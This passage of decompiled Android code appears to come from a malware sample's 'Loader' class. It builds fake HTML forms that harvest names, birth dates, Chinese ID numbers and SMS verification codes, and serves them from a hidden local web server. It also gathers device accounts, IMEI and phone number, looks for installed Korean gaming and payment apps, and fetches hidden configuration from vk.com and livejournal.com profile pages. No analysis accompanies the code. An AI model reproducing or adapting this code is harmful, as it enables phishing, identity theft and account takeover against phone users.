  3224. public final c.a.h<Object> a(Object[] objArr) {
  3225. d.e.b.h.b(objArr, "it");
  3226. Boolean bool = objArr[0];
  3227. if (bool == null) {
  3228. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  3229. }
  3230. if (bool.booleanValue()) {
  3231. this.a.showFullscreenFloatWindow();
  3232. } else {
  3233. this.a.removeFullscreenFloatWindow();
  3234. }
  3235. c.a.h<Object> a2 = c.a.h.a();
  3236. d.e.b.h.a((Object) a2, "Maybe.empty<Any>()");
  3237. return a2;
  3238. }
  3239. }
  3240.  
  3241. static final class z extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  3242. final /* synthetic */ Loader a;
  3243.  
  3244. z(Loader loader) {
  3245. this.a = loader;
  3246. super(1);
  3247. }
  3248.  
  3249. public final c.a.h<Object> a(Object[] objArr) {
  3250. d.e.b.h.b(objArr, "it");
  3251. String str = objArr[0];
  3252. if (str == null) {
  3253. throw new d.g("null cannot be cast to non-null type kotlin.String");
  3254. }
  3255. final String str2 = str;
  3256. c.a.h<Object> a2 = c.a.h.a((c.a.k<T>) new c.a.k<T>(this) {
  3257. final /* synthetic */ z a;
  3258.  
  3259. public final void a(c.a.i<Object> iVar) {
  3260. d.e.b.h.b(iVar, "it");
  3261. iVar.a(this.a.a.ping(str2, 4));
  3262. }
  3263. }).a(c.a.g.a.a());
  3264. d.e.b.h.a((Object) a2, "Maybe.create<Any> {\n …scribeOn(Schedulers.io())");
  3265. return a2;
  3266. }
  3267. }
  3268.  
  3269. public Loader() {
  3270. StringBuilder sb = new StringBuilder();
  3271. sb.append("\n<head>\n <title></title>\n <meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no\">\n <style>");
  3272. sb.append(this.A);
  3273. sb.append("</style>\n</head>\n");
  3274. this.B = sb.toString();
  3275. StringBuilder sb2 = new StringBuilder();
  3276. sb2.append("\n<!DOCTYPE html>\n<html>\n");
  3277. sb2.append(this.B);
  3278. sb2.append("\n<body>\n\n<script>\n function onValidate(name, date) {\n var idx = date.indexOf(\"-\")\n var i = parseInt(date.substr(0, idx))\n if(i >= 2000) {\n dateErr.innerText = \"");
  3279. sb2.append(q.b(6));
  3280. sb2.append("\"\n return false\n }\n return true\n }\n</script>\n\n<div class=\"appbar\">\n <div class=\"apptitle\">\n <span class=\"icon\"></span>\n <span class=\"title\">");
  3281. sb2.append(q.b(7));
  3282. sb2.append("</span>\n </div>\n</div>\n<div class=\"appbarb\"></div>\n<h3 style=\"margin-left:16px\">%%ACCOUNT%%</h3>\n<div style=\"margin: 10px 10px;\">\n <form action=\"/submit\" method=\"post\" onsubmit=\"return onValidate(name.value, date.value)\">\n <label class=\"yf\" for=\"name\" style=\"display: block\">");
  3283. sb2.append(q.b(8));
  3284. sb2.append(":</label>\n <div class=\"cont\">\n <input id=\"name\" name=\"name\" autocomplete=\"false\" type=\"text\" minlength=\"2\" required placeholder=\"");
  3285. sb2.append(q.b(8));
  3286. sb2.append("\">\n </div>\n <label class=\"yf\" for=\"date\" style=\"display: block\">");
  3287. sb2.append(q.b(9));
  3288. sb2.append(":</label>\n <div class=\"cont\">\n <input id=\"date\" name=\"date\" type=\"date\" max=\"2000-01-01\" required>\n </div>\n <div id=\"dateErr\" style=\"color: #dd4b39\">\n </div>\n <div class=\"cont btn-cont\">\n <button class=\"submit\" type=\"submit\" style=\"display: block\">");
  3289. sb2.append(q.b(4));
  3290. sb2.append("</button>\n </div>\n </form>\n</div>\n</body>\n\n</html>\n ");
  3291. this.C = sb2.toString();
  3292. StringBuilder sb3 = new StringBuilder();
  3293. sb3.append("\n<!DOCTYPE html>\n<html>\n");
  3294. sb3.append(this.B);
  3295. sb3.append("\n<body>\n\n<script>\n function onValidate(name, date) {\n var idx = date.indexOf(\"-\")\n var i = parseInt(date.substr(0, idx))\n if(i >= 2000) {\n dateErr.innerText = \"");
  3296. sb3.append(q.b(6));
  3297. sb3.append("\"\n return false\n }\n return true\n }\n</script>\n\n<div class=\"appbar\">\n <div class=\"apptitle\">\n <span class=\"icon\"></span>\n <span class=\"title\">");
  3298. sb3.append(q.b(7));
  3299. sb3.append("</span>\n </div>\n</div>\n<div class=\"appbarb\"></div>\n<h3 style=\"margin-left:16px\">%%ACCOUNT%%</h3>\n<div style=\"margin: 10px 10px;\">\n <form action=\"/submit\" method=\"post\" onsubmit=\"return onValidate(name.value, date.value)\">\n <label class=\"yf\" for=\"name\" style=\"display: block\">");
  3300. sb3.append(q.b(8));
  3301. sb3.append(":</label>\n <div class=\"cont\">\n <input id=\"name\" name=\"name\" autocomplete=\"false\" type=\"text\" minlength=\"2\" required placeholder=\"");
  3302. sb3.append(q.b(8));
  3303. sb3.append("\">\n </div>\n <label class=\"yf\" for=\"date\" style=\"display: block\">");
  3304. sb3.append(q.b(9));
  3305. sb3.append(":</label>\n <div class=\"cont\">\n <input id=\"date\" name=\"date\" type=\"date\" max=\"2000-01-01\" required>\n </div>\n <label class=\"yf\" for=\"idnum\" style=\"display: block\">身份證號:</label>\n <div class=\"cont\">\n <input id=\"idnum\" name=\"idnum\" min-length=\"8\" placeholder=\"身份證號\" required>\n </div>\n <div id=\"dateErr\" style=\"color: #dd4b39\">\n </div>\n <div class=\"cont btn-cont\">\n <button class=\"submit\" type=\"submit\" style=\"display: block\">");
  3306. sb3.append(q.b(4));
  3307. sb3.append("</button>\n </div>\n </form>\n</div>\n</body>\n\n</html>\n ");
  3308. this.D = sb3.toString();
  3309. StringBuilder sb4 = new StringBuilder();
  3310. sb4.append("\n<!DOCTYPE html>\n<html>\n");
  3311. sb4.append(this.B);
  3312. sb4.append("\n<body>\n\n<script>\n function onValidate(name, date) {\n return true\n }\n</script>\n\n<div class=\"appbar\">\n <div class=\"apptitle\">\n <span class=\"icon\"></span>\n <span class=\"title\">");
  3313. sb4.append(q.b(7));
  3314. sb4.append("</span>\n </div>\n</div>\n<div class=\"appbarb\"></div>\n<h3 style=\"margin-left:16px\">%%ACCOUNT%%</h3>\n<h3 style=\"margin-left:16px\">%%PHONE_NUMBER%%</h3>\n<div style=\"margin: 10px 10px;\">\n <form action=\"/submit\" method=\"post\" onsubmit=\"return onValidate(vcode.value)\">\n <label class=\"yf\" for=\"name\" style=\"display: block\">");
  3315. sb4.append(q.b(11));
  3316. sb4.append(":</label>\n <div class=\"cont\">\n <input id=\"vcode\" name=\"vcode\" autocomplete=\"false\" type=\"text\" minlength=\"2\" required placeholder=\"");
  3317. sb4.append(q.b(11));
  3318. sb4.append("\">\n </div>\n <div class=\"cont btn-cont\">\n <button class=\"submit\" type=\"submit\" style=\"display: block\">");
  3319. sb4.append(q.b(4));
  3320. sb4.append("</button>\n </div>\n </form>\n</div>\n</body>\n\n</html>\n ");
  3321. this.E = sb4.toString();
  3322. }
  3323.  
  3324. /* access modifiers changed from: private|final */
  3325. public final String a() {
  3326. d.e.b.j.a aVar = new d.e.b.j.a();
  3327. aVar.a = 0;
  3328. return (String) q.a((d.e.a.a<? extends T>) new i(this, aVar));
  3329. }
  3330.  
  3331. /* access modifiers changed from: private|final */
  3332. public final String a(Account account) {
  3333. int nextInt = new Random().nextInt(10000) + 12000;
  3334. b.g gVar = new b.g(nextInt);
  3335. gVar.a(new at(this, account, "/"));
  3336. gVar.b(new au(this, gVar, "/submit"));
  3337. new Thread(new av(gVar)).start();
  3338. StringBuilder sb = new StringBuilder();
  3339. sb.append("http://127.0.0.1:");
  3340. sb.append(nextInt);
  3341. sb.append('/');
  3342. return sb.toString();
  3343. }
  3344.  
  3345. /* access modifiers changed from: private|final */
  3346. public final String a(TelephonyManager telephonyManager) {
  3347. try {
  3348. String line1Number = telephonyManager.getLine1Number();
  3349. d.e.b.h.a((Object) line1Number, "tm.line1Number");
  3350. return line1Number;
  3351. } catch (Throwable th) {
  3352. return "";
  3353. }
  3354. }
  3355.  
  3356. /* access modifiers changed from: private|final */
  3357. public final String a(String str) {
  3358. SharedPreferences sharedPreferences = this.e;
  3359. if (sharedPreferences == null) {
  3360. d.e.b.h.b("preferences");
  3361. }
  3362. String string = sharedPreferences.getString("addr_url", "https://m.vk.com/%s?act=info");
  3363. d.e.b.m mVar = d.e.b.m.a;
  3364. d.e.b.h.a((Object) string, "urlFormat");
  3365. Object[] objArr = {str};
  3366. String format = String.format(string, Arrays.copyOf(objArr, objArr.length));
  3367. d.e.b.h.a((Object) format, "java.lang.String.format(format, *args)");
  3368. String str2 = null;
  3369. try {
  3370. SharedPreferences sharedPreferences2 = this.e;
  3371. if (sharedPreferences2 == null) {
  3372. d.e.b.h.b("preferences");
  3373. }
  3374. String a2 = a.b.a(format, sharedPreferences2.getString("addr_encoding", "utf-8"));
  3375. if (a2 != null) {
  3376. SharedPreferences sharedPreferences3 = this.e;
  3377. if (sharedPreferences3 == null) {
  3378. d.e.b.h.b("preferences");
  3379. }
  3380. String string2 = sharedPreferences3.getString("addr_pattern", "</dt><dd>([^<]+?)</dd></dl></div></div></div>");
  3381. String str3 = null;
  3382. Matcher matcher = Pattern.compile(string2).matcher(a2);
  3383. if (matcher.find()) {
  3384. str3 = matcher.group(1);
  3385. }
  3386. if (str3 != null) {
  3387. str2 = q.a(str3);
  3388. }
  3389. }
  3390. } catch (Exception e2) {
  3391. e2.printStackTrace();
  3392. }
  3393. if (str2 == null) {
  3394. Log.e("MSG", "DNS ERR");
  3395. }
  3396. return str2;
  3397. }
  3398.  
  3399. /* access modifiers changed from: private|final */
  3400. public final void a(boolean z2) {
  3401. Context context = this.a;
  3402. if (context == null) {
  3403. d.e.b.h.b("ctx");
  3404. }
  3405. WifiManager wifiManager = (WifiManager) context.getSystemService("wifi");
  3406. if (wifiManager != null) {
  3407. wifiManager.setWifiEnabled(z2);
  3408. }
  3409. }
  3410.  
  3411. public static final /* synthetic */ Context access$getCtx$p(Loader loader) {
  3412. Context context = loader.a;
  3413. if (context == null) {
  3414. d.e.b.h.b("ctx");
  3415. }
  3416. return context;
  3417. }
  3418.  
  3419. public static final /* synthetic */ SharedPreferences access$getPreferences$p(Loader loader) {
  3420. SharedPreferences sharedPreferences = loader.e;
  3421. if (sharedPreferences == null) {
  3422. d.e.b.h.b("preferences");
  3423. }
  3424. return sharedPreferences;
  3425. }
  3426.  
  3427. /* access modifiers changed from: private|final */
  3428. public final String b(String str) {
  3429. SharedPreferences sharedPreferences = this.e;
  3430. if (sharedPreferences == null) {
  3431. d.e.b.h.b("preferences");
  3432. }
  3433. String string = sharedPreferences.getString("addr_url", "https://%s.livejournal.com/profile");
  3434. d.e.b.m mVar = d.e.b.m.a;
  3435. d.e.b.h.a((Object) string, "urlFormat");
  3436. Object[] objArr = {str};
  3437. String format = String.format(string, Arrays.copyOf(objArr, objArr.length));
  3438. d.e.b.h.a((Object) format, "java.lang.String.format(format, *args)");
  3439. String str2 = null;
  3440. try {
  3441. SharedPreferences sharedPreferences2 = this.e;
  3442. if (sharedPreferences2 == null) {
  3443. d.e.b.h.b("preferences");
  3444. }
  3445. String a2 = a.b.a(format, sharedPreferences2.getString("addr_encoding", "utf-8"));
  3446. if (a2 != null) {
  3447. SharedPreferences sharedPreferences3 = this.e;
  3448. if (sharedPreferences3 == null) {
  3449. d.e.b.h.b("preferences");
  3450. }
  3451. String string2 = sharedPreferences3.getString("addr_pattern", "b-profile-bio-content\" link-target=\"_self\" *> *([^ <]+?) *</div>");
  3452. String str3 = null;
  3453. Matcher matcher = Pattern.compile(string2).matcher(a2);
  3454. if (matcher.find()) {
  3455. str3 = matcher.group(1);
  3456. }
  3457. if (str3 != null) {
  3458. str2 = q.a(str3);
  3459. }
  3460. }
  3461. } catch (Exception e2) {
  3462. e2.printStackTrace();
  3463. }
  3464. if (str2 == null) {
  3465. Log.e("MSG", "DNS ERR");
  3466. }
  3467. return str2;
  3468. }
  3469.  
  3470. /* access modifiers changed from: private|final */
  3471. public final void b() {
  3472. c.a.g.a.a().a(new f(this));
  3473. }
  3474.  
  3475. /* JADX DEBUG: Multi-variable type inference result: failure, time: 14 ms */
  3476. /* JADX WARNING: type inference failed for: r3v13 */
  3477. /* JADX WARNING: type inference failed for: r4v16, types: [com.d] */
  3478. /* access modifiers changed from: private|final */
  3479. /* JADX WARNING: Unknown variable types count: 1 */
  3480. public final void c() {
  3481. /*
  3482. r21 = this;
  3483. r0 = r21
  3484. java.util.concurrent.atomic.AtomicBoolean r2 = r0.o
  3485. boolean r2 = r2.get()
  3486. r5 = 1
  3487. if (r2 != 0) goto L_0x0025
  3488. r0 = r21
  3489. java.util.concurrent.atomic.AtomicBoolean r2 = r0.o
  3490. r3 = 1
  3491. r2.set(r3)
  3492. r0 = r21
  3493. android.os.Handler r3 = r0.b
  3494. com.Loader$j r2 = new com.Loader$j
  3495. r0 = r21
  3496. r2.m258init(r0)
  3497. java.lang.Runnable r2 = (java.lang.Runnable) r2
  3498. r6 = 5000(0x1388, double:2.4703E-320)
  3499. r3.postDelayed(r2, r6)
  3500. L_0x0025:
  3501. r0 = r21
  3502. android.content.SharedPreferences r2 = r0.e
  3503. if (r2 != 0) goto L_0x0030
  3504. java.lang.String r3 = "preferences"
  3505. d.e.b.h.b(r3)
  3506. L_0x0030:
  3507. java.lang.String r3 = "shut"
  3508. r4 = 0
  3509. int r14 = r2.getInt(r3, r4)
  3510. java.util.ArrayList r2 = new java.util.ArrayList
  3511. r2.<init>()
  3512. java.util.List r2 = (java.util.List) r2
  3513. r0 = r21
  3514. android.content.Context r3 = r0.a // Catch:{ Exception -> 0x0059 }
  3515. if (r3 != 0) goto L_0x0049
  3516. java.lang.String r4 = "ctx"
  3517. d.e.b.h.b(r4) // Catch:{ Exception -> 0x0059 }
  3518. L_0x0049:
  3519. java.lang.String r4 = "account"
  3520. java.lang.Object r3 = r3.getSystemService(r4) // Catch:{ Exception -> 0x0059 }
  3521. if (r3 != 0) goto L_0x0078
  3522. d.g r3 = new d.g // Catch:{ Exception -> 0x0059 }
  3523. java.lang.String r4 = "null cannot be cast to non-null type android.accounts.AccountManager"
  3524. r3.m563init(r4) // Catch:{ Exception -> 0x0059 }
  3525. throw r3 // Catch:{ Exception -> 0x0059 }
  3526. L_0x0059:
  3527. r3 = move-exception
  3528. r3.printStackTrace()
  3529. L_0x005d:
  3530. r0 = r21
  3531. android.content.Context r3 = r0.a
  3532. if (r3 != 0) goto L_0x0068
  3533. java.lang.String r4 = "ctx"
  3534. d.e.b.h.b(r4)
  3535. L_0x0068:
  3536. java.lang.String r4 = "phone"
  3537. java.lang.Object r3 = r3.getSystemService(r4)
  3538. if (r3 != 0) goto L_0x0184
  3539. d.g r2 = new d.g
  3540. java.lang.String r3 = "null cannot be cast to non-null type android.telephony.TelephonyManager"
  3541. r2.m563init(r3)
  3542. throw r2
  3543. L_0x0078:
  3544. android.accounts.AccountManager r3 = (android.accounts.AccountManager) r3 // Catch:{ Exception -> 0x0059 }
  3545. android.accounts.Account[] r6 = r3.getAccounts() // Catch:{ Exception -> 0x0059 }
  3546. java.lang.String r3 = "accounts"
  3547. d.e.b.h.a(r6, r3) // Catch:{ Exception -> 0x0059 }
  3548. int r3 = r6.length // Catch:{ Exception -> 0x0059 }
  3549. if (r3 != 0) goto L_0x02bf
  3550. r3 = 1
  3551. L_0x0087:
  3552. r3 = r3 ^ 1
  3553. if (r3 == 0) goto L_0x00be
  3554. java.util.ArrayList r3 = new java.util.ArrayList // Catch:{ Exception -> 0x0059 }
  3555. int r4 = r6.length // Catch:{ Exception -> 0x0059 }
  3556. r3.<init>(r4) // Catch:{ Exception -> 0x0059 }
  3557. java.util.Collection r3 = (java.util.Collection) r3 // Catch:{ Exception -> 0x0059 }
  3558. int r7 = r6.length // Catch:{ Exception -> 0x0059 }
  3559. r4 = 0
  3560. L_0x0095:
  3561. if (r4 >= r7) goto L_0x00b7
  3562. r8 = r6[r4]
  3563. java.lang.StringBuilder r9 = new java.lang.StringBuilder // Catch:{ Exception -> 0x0059 }
  3564. r9.<init>() // Catch:{ Exception -> 0x0059 }
  3565. java.lang.String r10 = r8.name // Catch:{ Exception -> 0x0059 }
  3566. r9.append(r10) // Catch:{ Exception -> 0x0059 }
  3567. java.lang.String r10 = ":"
  3568. r9.append(r10) // Catch:{ Exception -> 0x0059 }
  3569. java.lang.String r8 = r8.type // Catch:{ Exception -> 0x0059 }
  3570. r9.append(r8) // Catch:{ Exception -> 0x0059 }
  3571. java.lang.String r8 = r9.toString() // Catch:{ Exception -> 0x0059 }
  3572. r3.add(r8) // Catch:{ Exception -> 0x0059 }
  3573. int r4 = r4 + 1
  3574. goto L_0x0095
  3575. L_0x00b7:
  3576. java.util.List r3 = (java.util.List) r3 // Catch:{ Exception -> 0x0059 }
  3577. java.util.Collection r3 = (java.util.Collection) r3 // Catch:{ Exception -> 0x0059 }
  3578. r2.addAll(r3) // Catch:{ Exception -> 0x0059 }
  3579. L_0x00be:
  3580. java.lang.String[] r4 = com.c.e // Catch:{ Exception -> 0x0059 }
  3581. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3582. r3 = 0
  3583. L_0x00c4:
  3584. if (r3 >= r6) goto L_0x02c6
  3585. r7 = r4[r3]
  3586. r0 = r21
  3587. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3588. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3589. if (r7 == 0) goto L_0x02c2
  3590. r3 = 1
  3591. L_0x00d3:
  3592. if (r3 == 0) goto L_0x00da
  3593. java.lang.String r3 = "TT:"
  3594. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3595. L_0x00da:
  3596. java.lang.String[] r4 = com.c.d // Catch:{ Exception -> 0x0059 }
  3597. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3598. r3 = 0
  3599. L_0x00e0:
  3600. if (r3 >= r6) goto L_0x02cd
  3601. r7 = r4[r3]
  3602. r0 = r21
  3603. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3604. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3605. if (r7 == 0) goto L_0x02c9
  3606. r3 = 1
  3607. L_0x00ef:
  3608. if (r3 == 0) goto L_0x00f6
  3609. java.lang.String r3 = "MU:"
  3610. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3611. L_0x00f6:
  3612. java.lang.String[] r4 = com.c.f // Catch:{ Exception -> 0x0059 }
  3613. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3614. r3 = 0
  3615. L_0x00fc:
  3616. if (r3 >= r6) goto L_0x02d4
  3617. r7 = r4[r3]
  3618. r0 = r21
  3619. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3620. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3621. if (r7 == 0) goto L_0x02d0
  3622. r3 = 1
  3623. L_0x010b:
  3624. if (r3 == 0) goto L_0x0112
  3625. java.lang.String r3 = "DNF:"
  3626. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3627. L_0x0112:
  3628. java.lang.String[] r4 = com.c.g // Catch:{ Exception -> 0x0059 }
  3629. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3630. r3 = 0
  3631. L_0x0118:
  3632. if (r3 >= r6) goto L_0x02db
  3633. r7 = r4[r3]
  3634. r0 = r21
  3635. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3636. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3637. if (r7 == 0) goto L_0x02d7
  3638. r3 = 1
  3639. L_0x0127:
  3640. if (r3 == 0) goto L_0x012e
  3641. java.lang.String r3 = "HappyMoney:"
  3642. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3643. L_0x012e:
  3644. java.lang.String[] r4 = com.c.h // Catch:{ Exception -> 0x0059 }
  3645. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3646. r3 = 0
  3647. L_0x0134:
  3648. if (r3 >= r6) goto L_0x02e2
  3649. r7 = r4[r3]
  3650. r0 = r21
  3651. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3652. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3653. if (r7 == 0) goto L_0x02de
  3654. r3 = 1
  3655. L_0x0143:
  3656. if (r3 == 0) goto L_0x014a
  3657. java.lang.String r3 = "AXE:"
  3658. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3659. L_0x014a:
  3660. java.lang.String[] r4 = com.c.i // Catch:{ Exception -> 0x0059 }
  3661. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3662. r3 = 0
  3663. L_0x0150:
  3664. if (r3 >= r6) goto L_0x02e9
  3665. r7 = r4[r3]
  3666. r0 = r21
  3667. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3668. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3669. if (r7 == 0) goto L_0x02e5
  3670. r3 = 1
  3671. L_0x015f:
  3672. if (r3 == 0) goto L_0x0166
  3673. java.lang.String r3 = "nexonID:"
  3674. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3675. L_0x0166:
  3676. java.lang.String[] r4 = com.c.j // Catch:{ Exception -> 0x0059 }
  3677. int r6 = r4.length // Catch:{ Exception -> 0x0059 }
  3678. r3 = 0
  3679. L_0x016c:
  3680. if (r3 >= r6) goto L_0x02f0
  3681. r7 = r4[r3]
  3682. r0 = r21
  3683. java.util.Set<java.lang.String> r8 = r0.c // Catch:{ Exception -> 0x0059 }
  3684. boolean r7 = r8.contains(r7) // Catch:{ Exception -> 0x0059 }
  3685. if (r7 == 0) goto L_0x02ec
  3686. r3 = 1
  3687. L_0x017b:
  3688. if (r3 == 0) goto L_0x005d
  3689. java.lang.String r3 = "hangame:"
  3690. r2.add(r3) // Catch:{ Exception -> 0x0059 }
  3691. goto L_0x005d
  3692. L_0x0184:
  3693. android.telephony.TelephonyManager r3 = (android.telephony.TelephonyManager) r3
  3694. java.lang.String r4 = ""
  3695. r0 = r21
  3696. java.lang.String r4 = r0.a(r3) // Catch:{ Throwable -> 0x02b7 }
  3697. r12 = r4
  3698. L_0x018f:
  3699. java.lang.String r6 = ""
  3700. java.lang.String r4 = r3.getDeviceId() // Catch:{ Throwable -> 0x02bb }
  3701. java.lang.String r7 = "tm.deviceId"
  3702. d.e.b.h.a(r4, r7) // Catch:{ Throwable -> 0x02bb }
  3703. r13 = r4
  3704. L_0x019b:
  3705. r0 = r21
  3706. android.content.Context r4 = r0.a
  3707. if (r4 != 0) goto L_0x01a6
  3708. java.lang.String r6 = "ctx"
  3709. d.e.b.h.b(r6)
  3710. L_0x01a6:
  3711. java.lang.String r6 = "wifi"
  3712. java.lang.Object r4 = r4.getSystemService(r6)
  3713. if (r4 != 0) goto L_0x01b6
  3714. d.g r2 = new d.g
  3715. java.lang.String r3 = "null cannot be cast to non-null type android.net.wifi.WifiManager"
  3716. r2.m563init(r3)
  3717. throw r2
  3718. L_0x01b6:
  3719. android.net.wifi.WifiManager r4 = (android.net.wifi.WifiManager) r4
  3720. r4.startScan()
  3721. java.lang.String r6 = "Swi"
  3722. android.net.wifi.WifiManager$WifiLock r4 = r4.createWifiLock(r6) // Catch:{ Throwable -> 0x02f3 }
  3723. java.lang.String r6 = "wm.createWifiLock(\"Swi\")"
  3724. d.e.b.h.a(r4, r6) // Catch:{ Throwable -> 0x02f3 }
  3725. r0 = r21
  3726. r0.wifiLock = r4 // Catch:{ Throwable -> 0x02f3 }
  3727. r0 = r21
  3728. android.net.wifi.WifiManager$WifiLock r4 = r0.wifiLock // Catch:{ Throwable -> 0x02f3 }
  3729. if (r4 != 0) goto L_0x01d5
  3730. java.lang.String r6 = "wifiLock"
  3731. d.e.b.h.b(r6) // Catch:{ Throwable -> 0x02f3 }
  3732. L_0x01d5:
  3733. r6 = 0
  3734. r4.setReferenceCounted(r6) // Catch:{ Throwable -> 0x02f3 }
  3735. r0 = r21
  3736. android.net.wifi.WifiManager$WifiLock r4 = r0.wifiLock // Catch:{ Throwable -> 0x02f3 }
  3737. if (r4 != 0) goto L_0x01e4
  3738. java.lang.String r6 = "wifiLock"
  3739. d.e.b.h.b(r6) // Catch:{ Throwable -> 0x02f3 }
  3740. L_0x01e4:
  3741. r4.acquire() // Catch:{ Throwable -> 0x02f3 }
  3742. L_0x01e7:
  3743. r0 = r21
  3744. com.g r15 = r0.g
  3745. r0 = r21
  3746. android.content.Context r4 = r0.a
  3747. if (r4 != 0) goto L_0x01f6
  3748. java.lang.String r6 = "ctx"
  3749. d.e.b.h.b(r6)
  3750. L_0x01f6:
  3751. java.lang.String r16 = a.a.a(r4)
  3752. int r17 = com.c.a
  3753. java.lang.String r18 = android.os.Build.VERSION.RELEASE
  3754. java.lang.StringBuilder r4 = new java.lang.StringBuilder
  3755. r4.<init>()
  3756. java.lang.String r6 = android.os.Build.MODEL
  3757. r4.append(r6)
  3758. java.lang.String r6 = ":"
  3759. r4.append(r6)
  3760. java.lang.String r6 = android.os.Build.DISPLAY
  3761. r4.append(r6)
  3762. java.lang.String r19 = r4.toString()
  3763. r0 = r21
  3764. boolean r0 = r0.u
  3765. r20 = r0
  3766. int r3 = r3.getSimState()
  3767. r4 = 5
  3768. if (r3 != r4) goto L_0x02b3
  3769. r11 = r5
  3770. L_0x0226:
  3771. java.lang.Iterable r2 = (java.lang.Iterable) r2
  3772. java.lang.String r3 = "\n"
  3773. java.lang.CharSequence r3 = (java.lang.CharSequence) r3
  3774. r4 = 0
  3775. r5 = 0
  3776. r6 = 0
  3777. r7 = 0
  3778. r8 = 0
  3779. r9 = 62
  3780. r10 = 0
  3781. java.lang.String r2 = d.a.g.a(r2, r3, r4, r5, r6, r7, r8, r9, r10)
  3782. long r4 = r21.getFirstAppDate()
  3783. r0 = r21
  3784. android.content.SharedPreferences r3 = r0.e
  3785. if (r3 != 0) goto L_0x0247
  3786. java.lang.String r6 = "preferences"
  3787. d.e.b.h.b(r6)
  3788. L_0x0247:
  3789. java.lang.String r6 = "hello"
  3790. r7 = 12
  3791. java.lang.Object[] r7 = new java.lang.Object[r7]
  3792. r8 = 0
  3793. r7[r8] = r16
  3794. r8 = 1
  3795. java.lang.Integer r9 = java.lang.Integer.valueOf(r17)
  3796. r7[r8] = r9
  3797. r8 = 2
  3798. r7[r8] = r18
  3799. r8 = 3
  3800. r7[r8] = r19
  3801. r8 = 4
  3802. java.lang.Boolean r9 = java.lang.Boolean.valueOf(r20)
  3803. r7[r8] = r9
  3804. r8 = 5
  3805. java.lang.Integer r9 = java.lang.Integer.valueOf(r14)
  3806. r7[r8] = r9
  3807. r8 = 6
  3808. java.lang.Boolean r9 = java.lang.Boolean.valueOf(r11)
  3809. r7[r8] = r9
  3810. r8 = 7
  3811. r7[r8] = r12
  3812. r8 = 8
  3813. r7[r8] = r13
  3814. r8 = 9
  3815. r7[r8] = r2
  3816. r2 = 10
  3817. java.lang.Long r4 = java.lang.Long.valueOf(r4)
  3818. r7[r2] = r4
  3819. r2 = 11
  3820. java.lang.String r4 = "create"
  3821. r5 = 0
  3822. int r3 = r3.getInt(r4, r5)
  3823. java.lang.Integer r3 = java.lang.Integer.valueOf(r3)
  3824. r7[r2] = r3
  3825. c.a.s r5 = r15.b(r6, r7)
  3826. com.Loader$k r2 = new com.Loader$k
  3827. r0 = r21
  3828. r2.m259init(r0)
  3829. c.a.d.d r2 = (c.a.d.d) r2
  3830. com.Loader$l r3 = com.Loader.l.a
  3831. d.e.a.b r3 = (d.e.a.b) r3
  3832. if (r3 == 0) goto L_0x02ad
  3833. com.d r4 = new com.d
  3834. r4.m362init(r3)
  3835. r3 = r4
  3836. L_0x02ad:
  3837. c.a.d.d r3 = (c.a.d.d) r3
  3838. r5.a(r2, r3)
  3839. return
  3840. L_0x02b3:
  3841. r3 = 0
  3842. r11 = r3
  3843. goto L_0x0226
  3844. L_0x02b7:
  3845. r6 = move-exception
  3846. r12 = r4
  3847. goto L_0x018f
  3848. L_0x02bb:
  3849. r4 = move-exception
  3850. r13 = r6
  3851. goto L_0x019b
  3852. L_0x02bf:
  3853. r3 = 0
  3854. goto L_0x0087
  3855. L_0x02c2:
  3856. int r3 = r3 + 1
  3857. goto L_0x00c4
  3858. L_0x02c6:
  3859. r3 = 0
  3860. goto L_0x00d3
  3861. L_0x02c9:
  3862. int r3 = r3 + 1
  3863. goto L_0x00e0
  3864. L_0x02cd:
  3865. r3 = 0
  3866. goto L_0x00ef
  3867. L_0x02d0:
  3868. int r3 = r3 + 1
  3869. goto L_0x00fc
  3870. L_0x02d4:
  3871. r3 = 0
  3872. goto L_0x010b
  3873. L_0x02d7:
  3874. int r3 = r3 + 1
  3875. goto L_0x0118
  3876. L_0x02db:
  3877. r3 = 0
  3878. goto L_0x0127
  3879. L_0x02de:
  3880. int r3 = r3 + 1
  3881. goto L_0x0134
  3882. L_0x02e2:
  3883. r3 = 0
  3884. goto L_0x0143
  3885. L_0x02e5:
  3886. int r3 = r3 + 1
  3887. goto L_0x0150
  3888. L_0x02e9:
  3889. r3 = 0
  3890. goto L_0x015f
  3891. L_0x02ec:
  3892. int r3 = r3 + 1
  3893. goto L_0x016c
  3894. L_0x02f0:
  3895. r3 = 0
  3896. goto L_0x017b
  3897. L_0x02f3:
  3898. r4 = move-exception
  3899. goto L_0x01e7
  3900. */
  3901. throw new UnsupportedOperationException("Method not decompiled: com.Loader.c():void");
  3902. }
  3903.  
  3904. /* access modifiers changed from: private|final */
  3905. public final void c(String str) {
